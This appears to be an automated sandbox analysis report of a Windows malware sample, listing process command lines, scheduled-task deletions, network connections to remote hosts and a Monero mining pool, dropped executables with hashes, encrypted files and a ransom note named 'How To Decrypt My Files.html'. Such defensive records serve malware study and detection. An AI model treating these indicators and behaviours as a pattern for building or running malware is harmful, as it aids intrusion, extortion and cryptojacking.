"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:8

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /delete /tn "HOST" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout /T 5 /NOBREAK

Network

Country Destination Domain Proto
US 8.8.8.8:53 appengine.google.com udp
US 174.61.118.194:4872 tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 73.179.34.234:4872 tcp
US 174.61.118.194:4872 tcp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 www.google.com udp
DE 142.250.185.68:443 www.google.com tcp
DE 142.250.185.68:443 www.google.com tcp
DE 142.250.185.68:443 www.google.com tcp
DE 142.250.185.68:443 www.google.com udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 clients2.google.com udp
DE 142.250.185.238:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 88.221.135.1:443 www.bing.com udp
GB 88.221.135.1:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 95.101.143.183:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp
US 8.8.8.8:53 nyc.moneroocean.stream udp

Files

C:\Windows\systemprocess.exe

MD5 b5e966fbfca567c51d5da8b2106a48e5
SHA1 164ace9df43f1a760c1205f82c9cc4eb1dfee991
SHA256 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8
SHA512 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534

memory/3880-13-0x00007FF973523000-0x00007FF973525000-memory.dmp

C:\Windows\host.exe

MD5 1cf0ec247776f6817231070a2f75994c
SHA1 3253eccccece8243d11975e7021569251def8f2f
SHA256 e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051
SHA512 f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90

memory/3880-21-0x000001A4E37B0000-0x000001A4E3942000-memory.dmp

C:\Windows\CompPkg.exe

MD5 39ba631f3e54a2c480e7c83e5e6d14ff
SHA1 82f3e3f1faf9d879a37e473a81cb5d32672af099
SHA256 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64
SHA512 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16

memory/3880-32-0x000001A4FDD10000-0x000001A4FDD2C000-memory.dmp

memory/1060-33-0x00000000006C0000-0x000000000072A000-memory.dmp

memory/2336-34-0x0000000004A50000-0x0000000004A86000-memory.dmp

memory/3880-35-0x00007FF973520000-0x00007FF973FE1000-memory.dmp

memory/2336-36-0x00000000050C0000-0x00000000056E8000-memory.dmp

memory/2336-38-0x0000000004F70000-0x0000000004FD6000-memory.dmp

memory/2336-39-0x0000000004FE0000-0x0000000005046000-memory.dmp

memory/2336-37-0x0000000004ED0000-0x0000000004EF2000-memory.dmp

memory/2336-49-0x0000000005980000-0x0000000005CD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yobw5zrl.eix.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2336-60-0x0000000005FB0000-0x0000000005FFC000-memory.dmp

memory/2336-59-0x0000000005F80000-0x0000000005F9E000-memory.dmp

memory/3880-64-0x000001A4FDDF0000-0x000001A4FDE02000-memory.dmp

memory/3880-65-0x000001A4FDE00000-0x000001A4FDE3A000-memory.dmp

memory/3880-66-0x000001A4FE090000-0x000001A4FE0E0000-memory.dmp

memory/3880-67-0x000001A4FE1A0000-0x000001A4FE252000-memory.dmp

memory/3880-68-0x000001A4FDE40000-0x000001A4FDE8E000-memory.dmp

memory/3880-69-0x000001A4FE0E0000-0x000001A4FE12C000-memory.dmp

memory/3880-71-0x000001A4FE460000-0x000001A4FE48A000-memory.dmp

memory/3880-70-0x000001A4FE130000-0x000001A4FE17A000-memory.dmp

memory/4440-73-0x0000000006210000-0x000000000622A000-memory.dmp

memory/4440-72-0x0000000007380000-0x00000000079FA000-memory.dmp

memory/2336-75-0x00000000703A0000-0x00000000703EC000-memory.dmp

memory/2336-74-0x0000000006540000-0x0000000006572000-memory.dmp

memory/2336-85-0x0000000006520000-0x000000000653E000-memory.dmp

memory/2336-86-0x0000000007160000-0x0000000007203000-memory.dmp

memory/4440-88-0x00000000070F0000-0x0000000007182000-memory.dmp

memory/4440-87-0x0000000007FB0000-0x0000000008554000-memory.dmp

memory/2336-92-0x0000000007320000-0x000000000732A000-memory.dmp

memory/3880-93-0x000001A4FE5F0000-0x000001A4FE602000-memory.dmp

memory/3880-94-0x000001A4FE650000-0x000001A4FE68C000-memory.dmp

memory/2336-95-0x0000000007540000-0x00000000075D6000-memory.dmp

memory/2336-96-0x00000000074B0000-0x00000000074C1000-memory.dmp

memory/2336-97-0x00000000074F0000-0x00000000074FE000-memory.dmp

memory/2336-98-0x0000000007500000-0x0000000007514000-memory.dmp

memory/2336-99-0x00000000075E0000-0x00000000075FA000-memory.dmp

memory/2336-100-0x0000000007530000-0x0000000007538000-memory.dmp

memory/3880-104-0x00007FF973523000-0x00007FF973525000-memory.dmp

memory/3880-105-0x00007FF973520000-0x00007FF973FE1000-memory.dmp

memory/3880-106-0x000001A4FE690000-0x000001A4FE6A2000-memory.dmp

memory/2592-112-0x0000018F49250000-0x0000018F49272000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8a33aa094af018d8431665dc3e14d2f
SHA1 be2e69b4850222a2263069d42aab90488b10faf2
SHA256 42f33aec308ad7da8ae4d54a47cc23f2c1572c67a26e226abe969adebe263860
SHA512 92c250840a6a18e2a5971ec6c2fc4a639e5c971fbef4d2efdd04f2d4c400b66696d573f4602c8d2807f2085d7e57c620405c4c6955be250488d444ee2a73b271

memory/704-121-0x0000000140000000-0x000000014002B000-memory.dmp

memory/704-120-0x0000000140000000-0x000000014002B000-memory.dmp

memory/704-125-0x0000000140000000-0x000000014002B000-memory.dmp

memory/704-123-0x0000000140000000-0x000000014002B000-memory.dmp

memory/704-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/6036-148-0x0000000140000000-0x000000014000D000-memory.dmp

memory/6036-147-0x0000000140000000-0x000000014000D000-memory.dmp

memory/6036-146-0x0000000140000000-0x000000014000D000-memory.dmp

memory/6036-145-0x0000000140000000-0x000000014000D000-memory.dmp

memory/6036-144-0x0000000140000000-0x000000014000D000-memory.dmp

memory/6036-151-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4832-152-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-154-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-153-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp

memory/4480-170-0x0000024ECD000000-0x0000024ECD02A000-memory.dmp

memory/4480-171-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp

memory/3148-176-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3148-175-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3148-174-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4480-172-0x00007FF990940000-0x00007FF9909FE000-memory.dmp

memory/3148-180-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3148-173-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3148-182-0x00007FF990940000-0x00007FF9909FE000-memory.dmp

memory/3148-181-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp

memory/3148-183-0x0000000140000000-0x0000000140008000-memory.dmp

memory/616-187-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp

memory/616-186-0x000001C16DBD0000-0x000001C16DBF5000-memory.dmp

memory/616-188-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp

memory/672-206-0x00007FF951970000-0x00007FF951980000-memory.dmp

memory/672-205-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp

memory/672-199-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp

memory/616-195-0x00007FF951970000-0x00007FF951980000-memory.dmp

memory/616-194-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa187cac09f051e24146ad549a0f08a6
SHA1 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA256 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log

MD5 fde7cc81ed0c50e7ce18702102f19ace
SHA1 e9f02b348fda9b22bb3999b4ebef4d366f153086
SHA256 00ac4add3fbf73f31bdeb249969dddc68da554c9e9383ec524d63c64dc3f4b53
SHA512 75bf55c4f619948f16e29f51008d026e7789eda82615f566b150d54f5769b64d7fe1a6ff8be458e2630be621c551183dfe272ce0a579024065cbc2b4b26f4bf5

memory/3096-1470-0x0000000000F40000-0x0000000000FAA000-memory.dmp

memory/1060-1487-0x0000000000D10000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

MD5 f5c4fca52ede7a1173c28186128056d3
SHA1 c5184c28a972a646c8a3fe68f3c25e77ef2612af
SHA256 0bfe4ec1ae3f35ea64a3976443ad90f2825528df97c96a501f9a97af0fd74435
SHA512 29694fe89b3037a0ca1ee95382791ee2f3c4a9dd0067f41cf1152234fd45c3282bd43ce4edcd8b8c015868a21df78cb9b2d52e145d1caa4a5e04d0524092da1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a17e200fbd878dbf1c2ab1b41055a4a9
SHA1 6230263ac84f203773d750583e6d161f1c196ea0
SHA256 8506bb9534d6bd8a63eab4993f965128ed7f89d060b50da73219a1e753a50188
SHA512 8545eafd94f53238b34aa11f90358c96139d1482194028a3cf42accc073714e1562f6b9619c9fff9958643c083defff75077aeed6c41d347d94fe3235375ce5e

\??\pipe\crashpad_2016_GQJOXRGPYWMTSJZA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\ENC.img

MD5 8c785c53009428b38afac4b7a6b93c10
SHA1 2877606f84020beb917bd9b02483645bdcb07b42
SHA256 fa84153083d3de758fdc3ed86a9185f026755b9c89ba6f779ecd6df19ec1a94d
SHA512 23e20700b5d5f4c37c2701738f8ff5a010aaaca7ca4fce16703913dbe340239beb5ba403e92e7ef60b7e903b8d402e7ed29b7eee4048d7c4ec56de1ddb9db815

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 96520b2715b18824afc4ced48ea5533a
SHA1 a029d7c1327d9b15c4bfffa361778e1f465f02db
SHA256 80280adb178086fd68f3d9c09140e5bcf9e680712bc58ee28d04e16c8c12731a
SHA512 fcc93d51dcca3c06c8764d4f778da1a5851f5c7b9c126304f4d83c19163147b6698e0e33f72e398f42e595a2018a7df81860af84756490f7da4caced61000ded

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 36326fcbb6119326e7c8aa24c4156548
SHA1 ed128a9727e1d58b970e732b8c66fc827b18372b
SHA256 ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987
SHA512 ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe

C:\Users\Admin\Desktop\How To Decrypt My Files.html

MD5 d945801bb65b57524011cf0474ba0f0f
SHA1 eb4708741bb6dbce89239ddc1dad3a43dfb4403d
SHA256 ff1afd836f4bc07130484d89690d8251dd10218cc15b5a15fa04228376f55268
SHA512 cc2d9b4f5467ea53f05f65d76047c7f9e9f6bef8dd618ae9f834cadefaece4ea71e7d3814c32be7fe3c4bad0b27d6aafb27b1b5a4dfcfb53e928356dd92abc21

memory/3880-1801-0x000001A480000000-0x000001A480528000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 ad194e8c7806b1994b56acba749ddf70
SHA1 20ae0f73b983f0b748a6504f9fb1e1c7f8a6e802
SHA256 c0003276e0d4e9c32e76e44b101d019043e0b93af37ee8a81efd2aa6c8d35fe1
SHA512 f963b04d62119fae18c48951c350f1b49241292e711e6275e565f2de1cb017f6bc1c7e7759807a3f9fdacc9d0edf747a5665bf8395aecdbd19be98f85be88abb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 28ce813fea1e3b30cbbd0709cad09443
SHA1 580e515ebb3d91dbfbc4e8b2a95e1ea7a4fe1646
SHA256 77bc93285ab8c9c5aca6069322aabcb2c6af22ec7905a1ee06606dd549abdc6c
SHA512 bcf45637c491f4b44ce24dd3de149cbed84f4c0a67ef87e9362d7741e1007f291f657fcded087392dd9641fca600a10c4d203b3a181a63dbb44dae25e8ab63a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1433a720a65253183624aad3dec9a45b
SHA1 1e33997bc96fbf453f194ab03609eab8eab2af8d
SHA256 4699b1d334c030584f1722a7b101f9046c1b0b2f51cc577519e1c828fb11c462
SHA512 0608bf313b349ea43d8951d188709e6b832f709a9776e54edf9b2cb4ea4fc0d7e6fcaac925325d2296c3ed8e87b196c95053fc12e19b8eba3883423d700c9b03

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 f39ad1b5334e3c05ea773dd1a5a379f8
SHA1 5e97ca1a9b40bc933696893780f72bb2954ad17f
SHA256 bcf7c1a033d62ebe1502524b8ec9248f955b17e6a9fe79e5717758c5f918b2c3
SHA512 2555e680e55bd62e4574f3cd3f846e9cee3e08dd6cd5265dc80627f4fb24f939766f9bf5d80046cc2c8f08dbb99511b529788fe6fc373ac9b519fb3629e0c913

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d24e447c83e1abe8a220d59708e9af4c
